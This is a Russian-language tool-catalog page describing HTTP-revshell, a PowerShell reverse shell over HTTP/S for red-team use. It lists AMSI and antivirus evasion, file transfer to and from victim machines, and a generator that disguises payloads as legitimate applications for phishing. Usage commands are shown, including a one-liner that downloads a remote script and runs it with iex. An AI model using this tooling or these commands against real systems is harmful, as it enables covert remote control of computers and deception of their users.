Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
HTTP-revshell — Обратная оболочка PowerShell с использованием протокола HTTP/S с обходом AMSI и поддержкой прокси | Kitploit
Инструменты/GitHubGitHub/3v4si0n/http-revshell
Инструменты фишингаГенерация полезной нагрузкиОбход IDS/IPSПост-эксплуатацияКомандование и УправлениеRed TeamingИнструмент Удаленного Доступа
GitHub3v4si0n/http-revshell

HTTP-revshell

Обратная оболочка PowerShell с использованием протокола HTTP/S с обходом AMSI и поддержкой прокси

Репозиторий
598901 год назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Powershell HTTP/S Reverse Shell

Category-tool Powershell Python License

HTTP-revshell — это инструмент, ориентированный на упражнения Red Team и пентестеров. Данный инструмент обеспечивает обратное соединение через протокол http/s. Он использует скрытый канал для получения контроля над машиной жертвы посредством веб-запросов, обходя такие решения, как IDS, IPS и AV.

ПРИМЕЧАНИЕ: Инструмент не будет поддерживаться в части обхода. Всего несколько изменений позволят обойти многие EDR на рынке.

HTTP-revshell

Помощь server.py

Использование сервера:

root@kitploit:~
usage: server.py [-h] [--ssl] [--autocomplete] host port

positional arguments:
  host            Listen Host
  port            Listen Port

optional arguments:
  -h, --help      show this help message and exit
  --ssl           Send traffic over ssl
  --autocomplete  Autocomplete powershell functions

Помощь Invoke-WebRev.ps1 (клиент)

Использование клиента:

root@kitploit:~
Import-Module .\Invoke-WebRev.ps1
Invoke-WebRev -ip IP -port PORT [-ssl]

Установка

root@kitploit:~
git clone https://github.com/3v4Si0N/HTTP-revshell.git
cd HTTP-revshell/
pip3 install -r requirements.txt

Возможности

  • SSL
  • Proxy Aware
  • Загрузка файлов
  • Скачивание файлов
  • Загрузка PowerShell-скриптов через сервер
  • Контроль ошибок
  • AMSI bypass
  • Автодополнение функций PowerShell (опционально)

Использование дополнительных функций

Upload

Эта функция позволяет загрузить любой файл на машину жертвы.

Использование:

root@kitploit:~
upload /src/path/file C:\dest\path\file

Download

Эта функция позволяет скачать файл на машину атакующего.

Использование:

root@kitploit:~
download C:\src\path\file /dst/path/file

Loadps1

Эта функция позволяет загружать PowerShell-скрипты без записи на диск жертвы, читая файл через легитимный HTTP-трафик.

Использование:

root@kitploit:~
loadps1 /path/to/the/local/server/PowershellScript.ps1

Помощь Revshell-Generator.ps1 (Автоматический генератор полезной нагрузки)

Этот скрипт позволяет создать исполняемый файл с полезной нагрузкой, необходимой для использования HTTP-revshell; вам просто нужно следовать инструкциям на экране для его генерации. Доступно 6 предопределённых шаблонов и один настраиваемый с нужными вам данными.

Сгенерированные инструментом полезные нагрузки включают легитимную иконку приложения, а также информацию о продукте и авторских правах оригинального приложения. Кроме того, каждая из них открывает оригинальное приложение перед установкой соединения с сервером, имитируя легитимное приложение. Это можно использовать для фишинга или упражнений Red Team.

Использование генератора полезной нагрузки:

root@kitploit:~
powershell "iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Revshell-Generator.ps1 | iex"

Revshell-Generator

ВАЖНО: Все поля в предопределённых шаблонах автоматически заполняются нажатием клавиши Enter.

Благодарности

  • JoelGMSec за его потрясающий Revshell-Generator.ps1. Твиттер: @JoelGMSec
  • dev-2null за сообщение о первой ошибке. Твиттер: @dev2null

Отказ от ответственности и лицензия

Этот скрипт распространяется под лицензией LGPLv3+. Прямая ссылка на Лицензию.

HTTP-revshell следует использовать только для авторизованного тестирования на проникновение и/или некоммерческих образовательных целей. Любое неправомерное использование данного программного обеспечения не является ответственностью автора или любого другого соавтора. Используйте его на своих собственных серверах и/или с разрешения владельца сервера.

Скачать инструмент